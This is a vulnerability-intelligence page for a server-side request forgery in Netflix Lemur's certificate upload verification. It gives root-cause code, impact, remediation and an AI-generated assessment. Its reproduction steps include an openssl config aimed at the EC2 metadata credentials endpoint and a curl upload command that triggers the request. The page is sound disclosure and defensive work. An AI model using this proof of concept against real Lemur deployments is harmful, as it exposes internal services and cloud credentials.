Netflix Lemur CVE-2026-55162
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Operator role required (PR:L); network upload path (AV:N); SSRF impacts are limited to probing and cache poisoning (C:L/I:L/A:L) in the base case, with no scope change credited at base level.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
When verifying an uploaded certificate, lemur/certificates/verify.py extracts the CRL Distribution Point URL and the OCSP responder URL directly from the certificate's extensions and issues outbound requests to those URLs without scheme restriction or destination allow-listing. An authenticated user holding the operator role (required by StrictRolePermission on POST /certificates/upload) can craft a certificate whose extensions point at internal services - instance metadata endpoints, internal Kubernetes API servers, RFC1918 hosts, link-local addresses - and cause the Lemur host to issue requests against those destinations during verification.
Root Cause
lemur/certificates/verify.py, crl_verify:
point = p.full_name[0].value
# URL from CDP extension of uploaded cert
...
response = requests.get(point, timeout=(3.05, 6))
# no allow-list, no destination filterlemur/certificates/verify.py, ocsp_verify:
command = ["openssl", "x509", "-noout", "-ocsp_uri", "-in", cert_path]
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, ...)
url, _ = p1.communicate()
p2 = subprocess.Popen(
["openssl", "ocsp", "-issuer", issuer_chain_path, "-cert", cert_path,
"-url", url.strip()],
# attacker-controlled URL
...
)In both code paths the URL flows from attacker-controlled certificate-extension content to a network sink with no validation against an allow-list of hostnames, no scheme restriction beyond rejecting LDAP via InvalidSchema, and no filtering of RFC1918 / link-local (169.254/16) / loopback / IPv6 ULA destinations.
Affected Endpoints
| Method | Path | Source |
|---|---|---|
| POST | /api/1/certificates/upload | verify_string → crl_verify / ocsp_verify |
The bug additionally surfaces anywhere verify_string is invoked on attacker-influenced certificate content (sync paths, source plugin re-validation, etc.). The upload endpoint is the most direct trigger.
Impact
An operator-role attacker can:
- Probe the Lemur host's internal network through outbound CRL/OCSP fetches and infer topology from response timings and error messages.
- On EC2 instances without IMDSv2 enforcement, cause requests to
http://169.254.169.254/and influence downstream behavior of components that parse the response. - Pin attacker-controlled CRLs into the unbounded module-level
crl_cachedict (see Advisory 4c) for permanent cache poisoning - once cached, a poisoned CRL is served to every subsequent verification for the same URL.
The operator-role precondition reduces severity from what an unauthenticated SSRF would warrant, but operators are still meaningfully less trusted than the host's network position. PKI workflows also routinely process third-party certificates whose extensions are not directly controlled by the operator, broadening the trigger surface beyond purely-malicious operators.
Remediation
Filter the URL before it reaches the network sink. Either:
- Maintain an explicit allow-list of CRL/OCSP hostnames in configuration (e.g.,
LEMUR_TRUSTED_CRL_HOSTSandLEMUR_TRUSTED_OCSP_HOSTS) and reject anything outside the list, or - Use an SSRF-safe HTTP client wrapper that resolves the destination, rejects RFC1918 / link-local / loopback / IPv6 ULA addresses before connecting, and pins the resolved IP to defeat DNS rebinding.
For OCSP, route the parsed URL through the same wrapper before passing it as -url to openssl ocsp.
Additionally, bound crl_cache (see Advisory 4c) to prevent the SSRF vector from amplifying into a persistent cache-poisoning condition.
Steps to Reproduce
- Set up Lemur on an EC2 instance with IMDSv1 enabled (or any host with reachable RFC1918 services). Create an admin user and an operator-role user
eve. - Generate a self-signed certificate whose extensions point at internal services:
cat > openssl.cnf <<EOF
[req]
distinguished_name = req_distinguished_name
req_extensions = v3_ca
prompt = no
[req_distinguished_name]
CN = ssrf-poc.example
[v3_ca]
crlDistributionPoints = URI:http://169.254.169.254/latest/meta-data/iam/security-credentials/
authorityInfoAccess = OCSP;URI:http://169.254.169.254/latest/meta-data/
EOF
openssl req -x509 -newkey rsa:2048 -keyout ssrf.key -out ssrf.crt \
-days 365 -nodes -config openssl.cnf -extensions v3_ca- On the Lemur host, start a packet capture filter for the target address before submitting the cert:
sudo tcpdump -nni any host 169.254.169.254- As
eve, upload the malicious certificate:
BODY=$(cat ssrf.crt | sed ':a;N;$!ba;s/\n/\\n/g')
curl -X POST https://lemur.local/api/1/certificates/upload \
-H "Authorization: Bearer <eve_jwt>" \
-H "Content-Type: application/json" \
-d "{
\"name\": \"ssrf-poc\",
\"body\": \"$BODY\",
\"chain\": \"\",
\"private_key\": \"\",
\"owner\": \"eve@example.com\"
}"- Observe the outbound request to
169.254.169.254in the tcpdump output. The request originates from the Lemur process duringverify_stringprocessing of the uploaded cert. The attacker has successfully induced a server-side request to an internal address of their choosing.
AnalysisAI
Server-Side Request Forgery in Netflix Lemur's certificate verification pipeline allows an authenticated operator-role user to force the Lemur host to issue outbound HTTP requests to arbitrary internal destinations by uploading a crafted certificate whose CRL Distribution Point or OCSP responder extensions point to RFC1918 addresses, link-local endpoints (169.254.169.254), internal Kubernetes API servers, or loopback interfaces. Both crl_verify and ocsp_verify in lemur/certificates/verify.py pass attacker-controlled URLs directly to network sinks with no destination allow-list, scheme restriction beyond LDAP rejection, or private-address filtering. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an account with the operator role in Lemur (enforced by `StrictRolePermission` on `POST /api/1/certificates/upload`); unauthenticated access is not possible. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 score of 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) accurately reflects the operator-role prerequisite (PR:L) as the primary severity-limiting factor. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An operator-role user authenticates to Lemur, generates a self-signed certificate using openssl with CRL Distribution Point and Authority Info Access (OCSP) extensions pointing to `http://169.254.169.254/latest/meta-data/iam/security-credentials/` (EC2 IMDS), then uploads it via `POST /api/1/certificates/upload` with a valid JWT bearer token. During `verify_string` processing, the Lemur server issues an outbound HTTP GET to the IMDS endpoint, and on instances without IMDSv2 enforcement, the response containing IAM role credentials is returned to the Lemur process, with response timing and error messages observable to the attacker through the API response. … |
| Remediation | Upgrade to Lemur v1.9.2 (https://github.com/Netflix/lemur/releases/tag/v1.9.2), which patches both `crl_verify` and `ocsp_verify` to reject RFC1918, loopback, and link-local destinations before issuing outbound requests, and bounds the module-level `crl_cache` to 1,000 entries to prevent unbounded cache growth. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packe
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to se
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which mak
The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a
The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Rated hig
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this
A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL proto
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-54vg-pfh7-jq95